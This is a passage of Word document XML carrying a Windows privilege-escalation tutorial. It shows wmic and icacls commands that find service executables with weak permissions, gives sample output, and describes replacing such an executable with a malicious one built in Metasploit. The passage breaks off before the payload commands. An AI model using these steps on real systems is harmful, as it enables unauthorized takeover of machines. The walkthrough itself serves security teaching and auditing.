      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> "pathname"^|find /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> /v "system32"') do @echo %a &gt;&gt; c:\\windows\\temp\\permissions.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7031EA47" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">for /f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>eol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">^=^"^ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>delims</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">^=^" %a in (c:\\windows\\temp\\permissions.txt) do cmd.exe /c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>icacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> "%a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F59E34" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The first command uses wmic to list the services, looks for the full path of the executable, filters out system32 paths, and then dumps that output to a text file. The second command parses that text file getting rid of some junk in the path name then does the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>icacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command on that path to determine the permissions on that service executable. A snippet of the output you’ll see on the command line is below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC306D5" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\\Users\\homer&gt;cmd.exe /c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>icacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SMSvcHost.exe </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SMSvcHost.exe  BUILTIN</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\\IIS\_IUSRS:(I)(RX) NT AUTHORITY\\SYSTEM:(I)(F) BUILTIN\\Administrators:(I)(F) BUILTIN\\Users:(I)(RX)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EA0055" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A1B8688" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Successfully processed 1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>files;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Failed processing 0 files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D04FE74" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A2631D" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">c:\\Users\\homer&gt;cmd.exe /c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>icacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> "C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE" C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE BUILTIN\\Users:(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>I)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>F) NT AUTHORITY\\SYSTEM:(I)(F) BUILTIN\\Administrators:(I)(F) WIN-B5JHUDECH2P\\homer:(I)(F)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C10123" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22557EFF" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Successfully processed 1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>files;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Failed processing 0 files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F5C9F6" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2451CD97" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">c:\\Users\\homer&gt;cmd.exe /c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>icacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> "C:\\Program Files\\Common Files\\Microsoft Shared\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>OfficeSoftwareProtectionPlatform</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\\OSPPSVC.EXE" C:\\Program Files\\Common Files\\Microsoft Shared\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>OfficeSoftwareProtectionPlatform</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\\OSPPSVC.EXE NT AUTHORITY\\SYSTEM:(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>I)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>F) BUILTIN\\Administrators:(I)(F) BUILTIN\\Users:(I)(RX)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7148F0EB" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="164F6A20" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Successfully processed 1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>files;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Failed processing 0 files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA6FFC0" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">For my </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>particular commands</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> I’ve excluded service executables that live in c:\windows\system32 folder because more than likely those folders have the proper permissions because they came packaged with windows. The services I’m more interested in are third party applications because they get installed by a user and either the user improperly configures the folder permissions or during the install the application misconfigures the folder permissions. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> this is the main reason why I filter out c:\windows\system32 but if you wanted to include that simply remove the system32 find statement from the command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AE5672" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The output of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>icacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command can be a little confusing but what you want to look for is if “BUILTIN\Users” have full access which will be designated as “(F)”. If you have full access to the folder where the service executable </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>lives</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> then you can replace the service executable with your own malicious service executable. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> when the service starts, either at boot automatically or manually, your malicious executable will run hopefully giving you full access to the device. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> my snippet of output actually has a service with weak permissions which can also be seen on line 17 in the output above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F372A41" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\\Users\\homer&gt;cmd.exe /c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>icacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> "C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE" C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE BUILTIN\\Users:(F)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325CED76" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The “Source Engine” folder is a standard folder for windows 7 and out of the box has the proper permissions, meaning a regular user will not have write access to that folder. For this demonstration I’ve manually modified the permissions of the “Source Engine” folder to highlight the effect of improper permissions. So now that you’ve found a folder of a service that allows the write permission it’s time to insert / upload our malicious executable. The most </w:t>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>convenient way I’ve found is using the </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00E557B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          </w:rPr>
          <w:t>msfpayload</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> functionality within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. For the uninitiated and overwhelmed folks that try to deal with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>msfpayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> it might just be best to use backtrack. Just grab </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00E557B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          </w:rPr>
          <w:t>backtrack</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> which comes with everything installed and ready to go. I’m not going to go through </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the steps of getting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> up and running but if you have any troubles feel free to email me (travisaltman@gmail.com) or post a question in the comments. In backtrack I issue the following commands to create a malicious executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320E866F" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>root@bt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">:~# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> eth1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>eth1</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
